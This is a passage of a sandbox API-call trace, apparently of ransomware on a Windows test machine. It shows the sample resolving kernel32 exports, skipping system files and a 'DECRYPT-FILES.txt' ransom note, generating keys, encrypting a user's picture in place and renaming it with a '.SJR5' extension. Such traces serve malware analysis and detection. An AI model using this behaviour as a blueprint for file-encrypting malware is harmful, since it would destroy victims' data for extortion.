lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.422] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.422] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.422] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.422] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.422] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.422] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.422] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.422] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.422] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.422] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.422] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.422] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.422] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.422] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.422] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.422] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.422] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.422] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.423] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.423] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.423] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.423] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.423] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.423] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.423] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.423] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.423] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.423] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.423] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.423] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.423] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.423] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.423] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.423] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.424] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.424] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ltk0Cu1D.jpg") returned 57 [0086.424] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ltk0Cu1D.jpg.SJR5") returned 62 [0086.424] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ltk0Cu1D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ltk0cu1d.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ltk0Cu1D.jpg.SJR5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ltk0cu1d.jpg.sjr5"), dwFlags=0x0) returned 1 [0086.429] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.429] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.430] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.430] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf8847f0, ftCreationTime.dwHighDateTime=0x1d4d23b, ftLastAccessTime.dwLowDateTime=0xf0cf01e0, ftLastAccessTime.dwHighDateTime=0x1d4c701, ftLastWriteTime.dwLowDateTime=0xf0cf01e0, ftLastWriteTime.dwHighDateTime=0x1d4c701, nFileSizeHigh=0x0, nFileSizeLow=0x17272, dwReserved0=0x0, dwReserved1=0x0, cFileName="M7hZT_FgQuoNi6H.bmp", cAlternateFileName="M7HZT_~1.BMP")) returned 1 [0086.430] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.430] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp", lpString2="autorun.inf") returned 1 [0086.430] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp", lpString2="boot.ini") returned 1 [0086.430] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp", lpString2="desktop.ini") returned 1 [0086.430] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp", lpString2="ntuser.dat") returned -1 [0086.430] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp", lpString2="iconcache.db") returned 1 [0086.430] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp", lpString2="bootsect.bak") returned 1 [0086.430] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp", lpString2="ntuser.dat.log") returned -1 [0086.430] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp", lpString2="thumbs.db") returned -1 [0086.430] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp", lpString2="Bootfont.bin") returned 1 [0086.430] lstrlenW (lpString="M7hZT_FgQuoNi6H.bmp") returned 19 [0086.430] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.430] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.430] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.430] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.430] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.430] lstrlenW (lpString="M7hZT_FgQuoNi6H.bmp") returned 19 [0086.430] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.430] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="M7hZT_FgQuoNi6H.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\M7hZT_FgQuoNi6H.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\M7hZT_FgQuoNi6H.bmp" [0086.430] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\M7hZT_FgQuoNi6H.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\m7hzt_fgquoni6h.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.431] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=94834) returned 1 [0086.431] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.431] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.431] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.431] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.431] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.431] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.432] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.433] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.433] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.435] CloseHandle (hObject=0x42c) returned 1 [0086.435] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.435] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.436] CloseHandle (hObject=0x0) returned 0 [0086.436] CloseHandle (hObject=0x428) returned 1 [0086.436] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.436] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.436] GetTickCount () returned 0x114e0fd [0086.436] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.437] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.437] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.437] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.437] lstrlenA (lpString="kernel32.dll") returned 12 [0086.437] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.437] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.437] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.437] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.437] lstrlenA (lpString="ADDATOMA") returned 8 [0086.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.437] lstrlenA (lpString="ADDATOMW") returned 8 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.438] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.438] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.438] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.438] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.438] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.438] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.438] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.438] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.438] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.438] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.438] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.438] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.438] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.438] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.438] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.438] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.438] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.438] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.439] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.439] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.439] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.439] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.439] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.439] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.439] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.439] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.439] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.439] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.439] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.439] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.439] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.439] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.439] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.439] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.439] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.439] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.440] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.440] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.440] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.440] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.440] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.440] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.440] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.440] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.440] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.440] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.440] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: 